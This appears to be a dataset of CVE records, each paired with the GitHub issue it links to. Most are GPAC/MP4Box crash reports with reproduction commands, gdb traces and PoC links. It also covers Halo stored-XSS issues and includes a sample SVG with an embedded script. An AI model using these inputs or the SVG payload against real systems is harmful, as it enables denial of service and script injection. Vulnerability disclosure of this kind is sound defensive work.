GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --static-bin --enable-debug Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_DISABLE_3D ~~~~ To reproduce, run ~~~~ ./MP4Box -info poc ~~~~ POC: [poc.zip](https://github.com/gpac/gpac/files/7037176/mp4box-npd_naludmx_parse_nal_avc2474.zip) (unzip first) Here is the trace reported by gdb: ~~~~ #0 0x00000000008ac435 in naludmx_parse_nal_avc (ctx=0x1259a80, data=0x1239f73 "tr\372!", size=0xe, nal_type=0x14, skip_nal=0x7fffffff4fc4, is_slice=0x7fffffff4fd0, is_islice=0x7fffffff4fd4) at /mnt/data/playground/gpac/src/filters/reframe_nalu.c:2474 #1 0x00000000008ad7d3 in naludmx_process (filter=0x124cbe0) at /mnt/data/playground/gpac/src/filters/reframe_nalu.c:2874 #2 0x00000000007480a0 in gf_filter_process_task (task=0x123eee0) at /mnt/data/playground/gpac/src/filter_core/filter.c:2441 #3 0x000000000073798c in gf_fs_thread_proc (sess_thread=0x12382e0) at /mnt/data/playground/gpac/src/filter_core/filter_session.c:1640 #4 0x0000000000738305 in gf_fs_run (fsess=0x1238250) at /mnt/data/playground/gpac/src/filter_core/filter_session.c:1877 #5 0x00000000006571ea in gf_media_import (importer=0x7fffffff5bf0) at /mnt/data/playground/gpac/src/media_tools/media_import.c:1178 #6 0x000000000042cdf9 in convert_file_info (inName=0x7fffffffe163 "tmp", trackID=0x0) at /mnt/data/playground/gpac/applications/mp4box/fileimport.c:128 #7 0x00000000004168c3 in mp4boxMain (argc=0x7, argv=0x7fffffffddb8) at /mnt/data/playground/gpac/applications/mp4box/main.c:5925 #8 0x0000000000418d6b in main (argc=0x7, argv=0x7fffffffddb8) at /mnt/data/playground/gpac/applications/mp4box/main.c:6455 #9 0x0000000000caaa06 in generic_start_main () #10 0x0000000000caaff5 in __libc_start_main () #11 0x0000000000403f39 in _start () ~~~~

Segmentation fault casued by null pointer dereference using mp4box in naludmx_parse_nal_avc, reframe_nalu.c:2474

https://api.github.com/repos/gpac/gpac/issues/1886/comments

2021-08-24T07:11:15Z

2021-08-24T16:27:29Z

https://github.com/gpac/gpac/issues/1886

CVE-2021-40562

2022-01-12T22:15:07.760

A Segmentation fault caused by a floating point exception exists in Gpac through 1.0.1 using mp4box via the naludmx_enqueue_or_dispatch function in reframe_nalu.c, which causes a denial of service.

https://github.com/gpac/gpac/issues/1901

github.com

- [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). Hi, there. There is a segmentation fault caused by floating point exception in naludmx_enqueue_or_dispatch, reframe_nalu.c:675 in commit 592ba2689a3. Here is my environment, compiler info and gpac version: ~~~~ Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial gcc: 5.4.0 MP4Box - GPAC version 1.1.0-DEV-rev1170-g592ba26-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io MINI build (encoders, decoders, audio and video output disabled) Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --static-bin --enable-debug Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_DISABLE_3D ~~~~ To reproduce, run ~~~~ ./MP4Box -info poc ~~~~ POC: [poc.zip](https://github.com/gpac/gpac/files/7072643/mp4box-seg-fpe_naludmx_enqueue_or_dispatch675.zip) (unzip first) Program output: ~~~~ [AVC|H264] Possible Variable Frame Rate: VUI "fixed_frame_rate_flag" absent [AVC|H264] Warning: Error parsing NAL unit [AVC|H264] Error parsing Sequence Param Set [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [AVC|H264] Possible Variable Frame Rate: VUI "fixed_frame_rate_flag" absent [AVC|H264] Possible Variable Frame Rate: VUI "fixed_frame_rate_flag" absent [AVC|H264] Possible Variable Frame Rate: VUI "fixed_frame_rate_flag" absent [AVC|H264] Possible Variable Frame Rate: VUI "fixed_frame_rate_flag" absent [AVC|H264] Possible Variable Frame Rate: VUI "fixed_frame_rate_flag" absent Floating point exception (core dumped) ~~~~ Here is the trace reported by gdb: ~~~~ Stopped reason: SIGFPE gef➤ bt #0 0x000000000141ee30 in naludmx_enqueue_or_dispatch (ctx=0x24ada70, n_pck=0x0, flush_ref=<optimized out>) at /mnt/data/playground/gpac/src/filters/reframe_nalu.c:675 #1 0x0000000001449e53 in naludmx_process (filter=filter@entry=0x24a0bd0) at /mnt/data/playground/gpac/src/filters/reframe_nalu.c:2630 #2 0x0000000001447f4a in naludmx_process (filter=0x24a0bd0) at /mnt/data/playground/gpac/src/filters/reframe_nalu.c:3340 #3 0x0000000000fe4c18 in gf_filter_process_task (task=0x2492ed0) at /mnt/data/playground/gpac/src/filter_core/filter.c:2441 #4 0x0000000000f7b909 in gf_fs_thread_proc (sess_thread=sess_thread@entry=0x248c2b0) at /mnt/data/playground/gpac/src/filter_core/filter_session.c:1640 #5 0x0000000000f93558 in gf_fs_run (fsess=fsess@entry=0x248c220) at /mnt/data/playground/gpac/src/filter_core/filter_session.c:1877 #6 0x0000000000c18b4b in gf_media_import (importer=importer@entry=0x7fffffff5bf0) at /mnt/data/playground/gpac/src/media_tools/media_import.c:1178 #7 0x0000000000497345 in convert_file_info (inName=0x7fffffffe159 "tmp", trackID=0x0) at /mnt/data/playground/gpac/applications/mp4box/fileimport.c:128 #8 0x0000000000456aaa in mp4boxMain (argc=<optimized out>, argv=<optimized out>) at /mnt/data/playground/gpac/applications/mp4box/main.c:5925 #9 0x0000000001f06bb6 in generic_start_main () #10 0x0000000001f071a5 in __libc_start_main () #11 0x000000000041c4e9 in _start () ~~~~

Segmentation fault caused by floating point exception using mp4box in naludmx_enqueue_or_dispatch, reframe_nalu.c:675

https://api.github.com/repos/gpac/gpac/issues/1901/comments

2021-08-29T14:05:34Z

2021-08-30T15:33:46Z

https://github.com/gpac/gpac/issues/1901

CVE-2021-40563

2022-01-12T22:15:07.807

A Segmentation fault exists casued by null pointer dereference exists in Gpac through 1.0.1 via the naludmx_create_avc_decoder_config function in reframe_nalu.c when using mp4box, which causes a denial of service.

https://github.com/gpac/gpac/issues/1892

github.com

- [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). Hi, there. There is a segmentation fault caused by null pointer dereference in naludmx_create_avc_decoder_config, reframe_nalu.c:1297 in commit 592ba2689a3. Here is my environment, compiler info and gpac version: ~~~~ Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial gcc: 5.4.0 MP4Box - GPAC version 1.1.0-DEV-rev1170-g592ba26-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io MINI build (encoders, decoders, audio and video output disabled) Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --static-bin --enable-debug Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_DISABLE_3D ~~~~ To reproduce, run ~~~~ ./MP4Box -info poc ~~~~ POC: [poc.zip](https://github.com/gpac/gpac/files/7044482/mp4box-seg-npd_naludmx_create_avc_decoder_config1297.zip) (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef➤ bt #0 0x0000000001430251 in naludmx_create_avc_decoder_config (ctx=ctx@entry=0x24ada70, dsi=dsi@entry=0x7fffffff4d28, dsi_size=dsi_size@entry=0x7fffffff4d20, dsi_enh=dsi_enh@entry=0x7fffffff4d30, dsi_enh_size=dsi_enh_size@entry=0x7fffffff4d24, max_width=max_width@entry=0x7fffffff4d10, max_height=0x7fffffff4d14, max_enh_width=0x7fffffff4d18, max_enh_height=0x7fffffff4d1c, sar=0x7fffffff4d38) at /mnt/data/playground/gpac/src/filters/reframe_nalu.c:1297 #1 0x00000000014334ab in naludmx_check_pid (filter=filter@entry=0x24a0bd0, ctx=ctx@entry=0x24ada70) at /mnt/data/playground/gpac/src/filters/reframe_nalu.c:1462 #2 0x0000000001441315 in naludmx_process (filter=0x24a0bd0) at /mnt/data/playground/gpac/src/filters/reframe_nalu.c:2895 #3 0x0000000000fe4c18 in gf_filter_process_task (task=0x2492ed0) at /mnt/data/playground/gpac/src/filter_core/filter.c:2441 #4 0x0000000000f7b909 in gf_fs_thread_proc (sess_thread=sess_thread@entry=0x248c2b0) at /mnt/data/playground/gpac/src/filter_core/filter_session.c:1640 #5 0x0000000000f93558 in gf_fs_run (fsess=fsess@entry=0x248c220) at /mnt/data/playground/gpac/src/filter_core/filter_session.c:1877 #6 0x0000000000c18b4b in gf_media_import (importer=importer@entry=0x7fffffff5bf0) at /mnt/data/playground/gpac/src/media_tools/media_import.c:1178 #7 0x0000000000497345 in convert_file_info (inName=0x7fffffffe159 "tmp", trackID=0x0) at /mnt/data/playground/gpac/applications/mp4box/fileimport.c:128 #8 0x0000000000456aaa in mp4boxMain (argc=<optimized out>, argv=<optimized out>) at /mnt/data/playground/gpac/applications/mp4box/main.c:5925 #9 0x0000000001f06bb6 in generic_start_main () #10 0x0000000001f071a5 in __libc_start_main () #11 0x000000000041c4e9 in _start () ~~~~ The reason for this bug is that the program does not check the nullity of the pointer. <img width="685" alt="image" src="https://user-images.githubusercontent.com/7632714/130743176-e3e41fdf-fdb9-45cf-b68f-d27657ab0a37.png">

Segmentation fault casued by null pointer dereference using mp4box in naludmx_create_avc_decoder_config, reframe_nalu.c:1297

https://api.github.com/repos/gpac/gpac/issues/1892/comments

2021-08-25T07:12:15Z

2021-08-30T15:33:44Z

https://github.com/gpac/gpac/issues/1892

CVE-2021-40564

2022-01-12T22:15:07.847

A Segmentation fault caused by null pointer dereference vulnerability eists in Gpac through 1.0.2 via the avc_parse_slice function in av_parsers.c when using mp4box, which causes a denial of service.

https://github.com/gpac/gpac/issues/1898

github.com

- [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). Hi, there. There is a segmentation fault caused by null pointer dereference in avc_parse_slice, av_parsers.c:5678 in commit 592ba2689a3. Here is my environment, compiler info and gpac version: ~~~~ Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial gcc: 5.4.0 MP4Box - GPAC version 1.1.0-DEV-rev1170-g592ba26-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io MINI build (encoders, decoders, audio and video output disabled) Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --static-bin --enable-debug Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_DISABLE_3D ~~~~ To reproduce, run ~~~~ ./MP4Box -info poc ~~~~ POC: [poc.zip](https://github.com/gpac/gpac/files/7059392/mp4box-seg-npd-avc_parse_slice5678.zip) (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef➤ bt #0 0x0000000000bcd59d in avc_parse_slice (svc_idr_flag=GF_FALSE, si=0x7fffffff5020, avc=0x24ae050, bs=0x248df40) at /mnt/data/playground/gpac/src/media_tools/av_parsers.c:5678 #1 gf_avc_parse_nalu (bs=0x248df40, avc=0x24ae050) at /mnt/data/playground/gpac/src/media_tools/av_parsers.c:6087 #2 0x000000000144109d in naludmx_parse_nal_avc (is_islice=<synthetic pointer>, is_slice=<synthetic pointer>, skip_nal=<synthetic pointer>, nal_type=0x4, size=0x4f, data=0x2491e5b "$1\200", ctx=0x24ada70) at /mnt/data/playground/gpac/src/filters/reframe_nalu.c:2348 #3 naludmx_process (filter=0x24a0bd0) at /mnt/data/playground/gpac/src/filters/reframe_nalu.c:2874 #4 0x0000000000fe4c18 in gf_filter_process_task (task=0x248d520) at /mnt/data/playground/gpac/src/filter_core/filter.c:2441 #5 0x0000000000f7b909 in gf_fs_thread_proc (sess_thread=sess_thread@entry=0x248c2b0) at /mnt/data/playground/gpac/src/filter_core/filter_session.c:1640 #6 0x0000000000f93558 in gf_fs_run (fsess=fsess@entry=0x248c220) at /mnt/data/playground/gpac/src/filter_core/filter_session.c:1877 #7 0x0000000000c18b4b in gf_media_import (importer=importer@entry=0x7fffffff5bf0) at /mnt/data/playground/gpac/src/media_tools/media_import.c:1178 #8 0x0000000000497345 in convert_file_info (inName=0x7fffffffe159 "tmp", trackID=0x0) at /mnt/data/playground/gpac/applications/mp4box/fileimport.c:128 #9 0x0000000000456aaa in mp4boxMain (argc=<optimized out>, argv=<optimized out>) at /mnt/data/playground/gpac/applications/mp4box/main.c:5925 #10 0x0000000001f06bb6 in generic_start_main () #11 0x0000000001f071a5 in __libc_start_main () #12 0x000000000041c4e9 in _start () ~~~~ The reason for this bug is that the program does not check the nullity of the pointer. <img width="655" alt="image" src="https://user-images.githubusercontent.com/7632714/130955606-eefd9dbd-049a-48b2-ab9f-fa46197e9d99.png">

Segmentation fault caused by null pointer dereference using mp4box in avc_parse_slice, av_parsers.c:5678

https://api.github.com/repos/gpac/gpac/issues/1898/comments

2021-08-26T11:34:51Z

2021-08-30T15:33:45Z

https://github.com/gpac/gpac/issues/1898

CVE-2021-40565

2022-01-12T22:15:07.890

A Segmentation fault caused by a null pointer dereference vulnerability exists in Gpac through 1.0.1 via the gf_avc_parse_nalu function in av_parsers.c when using mp4box, which causes a denial of service.

https://github.com/gpac/gpac/issues/1902

github.com

- [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). Hi, there. There is a segmentation fault caused by nod in gf_avc_parse_nalu, av_parsers.c:6112 in commit 592ba2689a3. Here is my environment, compiler info and gpac version: ~~~~ Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial gcc: 5.4.0 MP4Box - GPAC version 1.1.0-DEV-rev1170-g592ba26-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io MINI build (encoders, decoders, audio and video output disabled) Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --static-bin --enable-debug Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_DISABLE_3D ~~~~ To reproduce, run ~~~~ ./MP4Box -info poc ~~~~ POC: [poc.zip](https://github.com/gpac/gpac/files/7072659/mp4box-seg-npd_gf_avc_parse_nalu6112.zip) (unzip first) Program output: ~~~~ [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] corrupted exp-golomb code, 32 leading zeros, max 31 allowed ! [Core] corrupted exp-golomb code, 32 leading zeros, max 31 allowed ! [Core] corrupted exp-golomb code, 32 leading zeros, max 31 allowed ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] corrupted exp-golomb code, 32 leading zeros, max 31 allowed ! [Core] corrupted exp-golomb code, 32 leading zeros, max 31 allowed ! [Core] corrupted exp-golomb code, 32 leading zeros, max 31 allowed ! [Core] corrupted exp-golomb code, 32 leading zeros, max 31 allowed ! [Core] corrupted exp-golomb code, 32 leading zeros, max 31 allowed ! Segmentation fault (core dumped) ~~~~ Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef➤ bt #0 0x0000000000bd0648 in gf_avc_parse_nalu (bs=<optimized out>, avc=0x24ae050) at /mnt/data/playground/gpac/src/media_tools/av_parsers.c:6112 #1 0x000000000144109d in naludmx_parse_nal_avc (is_islice=<synthetic pointer>, is_slice=<synthetic pointer>, skip_nal=<synthetic pointer>, nal_type=0x4, size=0x3b, data=0x2491e67 "$1", ctx=0x24ada70) at /mnt/data/playground/gpac/src/filters/reframe_nalu.c:2348 #2 naludmx_process (filter=0x24a0bd0) at /mnt/data/playground/gpac/src/filters/reframe_nalu.c:2874 #3 0x0000000000fe4c18 in gf_filter_process_task (task=0x248d520) at /mnt/data/playground/gpac/src/filter_core/filter.c:2441 #4 0x0000000000f7b909 in gf_fs_thread_proc (sess_thread=sess_thread@entry=0x248c2b0) at /mnt/data/playground/gpac/src/filter_core/filter_session.c:1640 #5 0x0000000000f93558 in gf_fs_run (fsess=fsess@entry=0x248c220) at /mnt/data/playground/gpac/src/filter_core/filter_session.c:1877 #6 0x0000000000c18b4b in gf_media_import (importer=importer@entry=0x7fffffff5bf0) at /mnt/data/playground/gpac/src/media_tools/media_import.c:1178 #7 0x0000000000497345 in convert_file_info (inName=0x7fffffffe159 "tmp", trackID=0x0) at /mnt/data/playground/gpac/applications/mp4box/fileimport.c:128 #8 0x0000000000456aaa in mp4boxMain (argc=<optimized out>, argv=<optimized out>) at /mnt/data/playground/gpac/applications/mp4box/main.c:5925 #9 0x0000000001f06bb6 in generic_start_main () #10 0x0000000001f071a5 in __libc_start_main () #11 0x000000000041c4e9 in _start () ~~~~

Segmentation fault caused by null pointer dereference using mp4box in gf_avc_parse_nalu, av_parsers.c:6112

https://api.github.com/repos/gpac/gpac/issues/1902/comments

2021-08-29T14:14:22Z

2021-08-30T15:33:46Z

https://github.com/gpac/gpac/issues/1902

CVE-2021-40566

2022-01-12T22:15:07.933

A Segmentation fault casued by heap use after free vulnerability exists in Gpac through 1.0.1 via the mpgviddmx_process function in reframe_mpgvid.c when using mp4box, which causes a denial of service.

https://github.com/gpac/gpac/issues/1887

github.com

- [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). Hi, there. There is a segmentation fault caused by null pointer dereference in mpgviddmx_process, reframe_mpgvid.c:851 in commit 592ba2689a3. Here is my environment, compiler info and gpac version: ~~~~ Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial gcc: 5.4.0 MP4Box - GPAC version 1.1.0-DEV-rev1170-g592ba26-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io MINI build (encoders, decoders, audio and video output disabled) Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --static-bin --enable-debug Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_DISABLE_3D ~~~~ To reproduce, run ~~~~ ./MP4Box -info poc ~~~~ POC: [poc.zip](https://github.com/gpac/gpac/files/7037550/mp4box-npd_mpgviddmx_process851.zip) (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef➤ bt #0 0x0000000000cf5a9b in memcpy () #1 0x00000000008a24a7 in mpgviddmx_process (filter=0x124cbd0) at /mnt/data/playground/gpac/src/filters/reframe_mpgvid.c:851 #2 0x00000000007480a0 in gf_filter_process_task (task=0x123a0e0) at /mnt/data/playground/gpac/src/filter_core/filter.c:2441 #3 0x000000000073798c in gf_fs_thread_proc (sess_thread=0x12382b0) at /mnt/data/playground/gpac/src/filter_core/filter_session.c:1640 #4 0x0000000000738305 in gf_fs_run (fsess=0x1238220) at /mnt/data/playground/gpac/src/filter_core/filter_session.c:1877 #5 0x00000000006571ea in gf_media_import (importer=0x7fffffff5c20) at /mnt/data/playground/gpac/src/media_tools/media_import.c:1178 #6 0x000000000042cdf9 in convert_file_info (inName=0x7fffffffe163 "tmp", trackID=0x0) at /mnt/data/playground/gpac/applications/mp4box/fileimport.c:128 #7 0x00000000004168c3 in mp4boxMain (argc=0x3, argv=0x7fffffffdde8) at /mnt/data/playground/gpac/applications/mp4box/main.c:5925 #8 0x0000000000418d6b in main (argc=0x3, argv=0x7fffffffdde8) at /mnt/data/playground/gpac/applications/mp4box/main.c:6455 #9 0x0000000000caaa06 in generic_start_main () #10 0x0000000000caaff5 in __libc_start_main () #11 0x0000000000403f39 in _start () ~~~~ The reason for this bug is that the program does not check the nullity of the pointer before copy memory to it. <img width="1324" alt="image" src="https://user-images.githubusercontent.com/7632714/130580112-09339006-e245-4ade-8697-da5e6fab037d.png">

Segmentation fault casued by heap use after free using mp4box in mpgviddmx_process, reframe_mpgvid.c:851

https://api.github.com/repos/gpac/gpac/issues/1887/comments

2021-08-24T08:04:48Z

2021-08-30T15:33:43Z

https://github.com/gpac/gpac/issues/1887

CVE-2022-22123

2022-01-13T17:15:07.810

In Halo, versions v1.0.0 to v1.4.17 (latest) are vulnerable to Stored Cross-Site Scripting (XSS) in the article title. An authenticated attacker can inject arbitrary javascript code that will execute on a victim’s server.

https://github.com/halo-dev/halo/issues/1557

github.com

### What is version of Halo has the issue? 1.4.13 ### What database are you using? H2 ### What is your deployment method? Fat Jar ### Your site address. _No response_ ### What happened? 虽然目前后台仅仅只能由一个管理员来操作，但某些内容输入框能够插入 JavaScript 代码依旧是不妥的，比如文章标题、分类创建等。希望能够对这些地方做处理。 ### Relevant log output _No response_ ### Additional information _No response_

处理后台各个输入框的 XSS 安全问题

https://api.github.com/repos/halo-dev/halo/issues/1557/comments

2021-12-02T14:09:30Z

2022-12-16T08:14:40Z

https://github.com/halo-dev/halo/issues/1557

CVE-2022-22124

2022-01-13T17:15:07.867

In Halo, versions v1.0.0 to v1.4.17 (latest) are vulnerable to Stored Cross-Site Scripting (XSS) in the profile image. An authenticated attacker can upload a carefully crafted SVG file that will trigger arbitrary javascript to run on a victim’s browser.

https://github.com/halo-dev/halo/issues/1575

github.com

### 是什么版本出现了此问题？ 1.4.15 ### 使用的什么数据库？ H2 ### 使用的哪种方式部署？ Fat Jar ### 在线站点地址 _No response_ ### 发生了什么？ SVG 文件包含 JS 脚本可能会引发的 XSS 漏洞，当然目前也仅仅只有在管理端会触发，但有一定必要做优化。 SVG 文件示例： ``` <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <rect width="500" height="500" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" /> <script type="text/javascript"> alert("POC"); </script> </svg> ``` ### 相关日志输出 _No response_ ### 附加信息 _No response_

上传 SVG 图片可能引发的 XSS 问题。

https://api.github.com/repos/halo-dev/halo/issues/1575/comments

2021-12-06T12:01:50Z

2022-12-16T08:14:40Z

https://github.com/halo-dev/halo/issues/1575

CVE-2021-40567

2022-01-13T18:15:07.933

Segmentation fault vulnerability exists in Gpac through 1.0.1 via the gf_odf_size_descriptor function in desc_private.c when using mp4box, which causes a denial of service.

https://github.com/gpac/gpac/issues/1889

github.com

- [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). Hi, there. There is a segmentation fault in gf_odf_desc_copy, odf_codec.c:381 in commit 592ba2689a3. Here is my environment, compiler info and gpac version: ~~~~ Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial gcc: 5.4.0 MP4Box - GPAC version 1.1.0-DEV-rev1170-g592ba26-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io MINI build (encoders, decoders, audio and video output disabled) Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --static-bin --enable-debug Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FREETYPE GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_DISABLE_3D ~~~~ To reproduce, run ~~~~ ./MP4Box -hint poc ~~~~ POC: [poc.zip](https://github.com/gpac/gpac/files/7038682/mp4box-gf_odf_size_descriptor380.zip) (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef➤ bt #0 0x0000000001a016e8 in gf_odf_size_descriptor (desc=0x3e8024746a0, outSize=outSize@entry=0x7fffffff6994) at /mnt/data/playground/gpac/src/odf/desc_private.c:380 #1 0x0000000000aeaaee in gf_odf_size_dcd (dcd=0x7fffffff6ae0, outSize=0x7fffffff69c4) at /mnt/data/playground/gpac/src/odf/odf_code.c:1211 #2 0x0000000001a01b15 in gf_odf_size_descriptor (desc=desc@entry=0x7fffffff6ae0, outSize=outSize@entry=0x7fffffff69c4) at /mnt/data/playground/gpac/src/odf/desc_private.c:386 #3 0x0000000000aeade9 in gf_odf_write_dcd (bs=0x249a960, dcd=0x7fffffff6ae0) at /mnt/data/playground/gpac/src/odf/odf_code.c:1235 #4 0x0000000001a020bd in gf_odf_write_descriptor (bs=bs@entry=0x249a960, desc=desc@entry=0x7fffffff6ae0) at /mnt/data/playground/gpac/src/odf/desc_private.c:487 #5 0x0000000000af1357 in gf_odf_desc_write_bs (desc=desc@entry=0x7fffffff6ae0, bs=bs@entry=0x249a960) at /mnt/data/playground/gpac/src/odf/odf_codec.c:325 #6 0x0000000000af14b7 in gf_odf_desc_write (desc=desc@entry=0x7fffffff6ae0, outEncDesc=outEncDesc@entry=0x7fffffff6a30, outSize=outSize@entry=0x7fffffff6a2c) at /mnt/data/playground/gpac/src/odf/odf_codec.c:343 #7 0x0000000000af17f6 in gf_odf_desc_copy (inDesc=inDesc@entry=0x7fffffff6ae0, outDesc=outDesc@entry=0x2497550) at /mnt/data/playground/gpac/src/odf/odf_codec.c:387 #8 0x00000000009d2a3f in gf_isom_set_extraction_slc (the_file=the_file@entry=0x248c220, trackNumber=trackNumber@entry=0x6, StreamDescriptionIndex=StreamDescriptionIndex@entry=0x1, slConfig=slConfig@entry=0x7fffffff6ae0) at /mnt/data/playground/gpac/src/isomedia/isom_write.c:5468 #9 0x0000000000ce75ff in gf_hinter_finalize (file=file@entry=0x248c220, IOD_Profile=<optimized out>, bandwidth=bandwidth@entry=0x8bdf) at /mnt/data/playground/gpac/src/media_tools/isom_hinter.c:1245 #10 0x000000000043c218 in HintFile (file=0x248c220, MTUSize=MTUSize@entry=0x59e, max_ptime=0x0, rtp_rate=0x0, base_flags=<optimized out>, copy_data=GF_FALSE, interleave=GF_FALSE, regular_iod=GF_FALSE, single_group=GF_FALSE, hint_no_offset=GF_FALSE) at /mnt/data/playground/gpac/applications/mp4box/main.c:3550 #11 0x000000000044bd42 in mp4boxMain (argc=<optimized out>, argv=<optimized out>) at 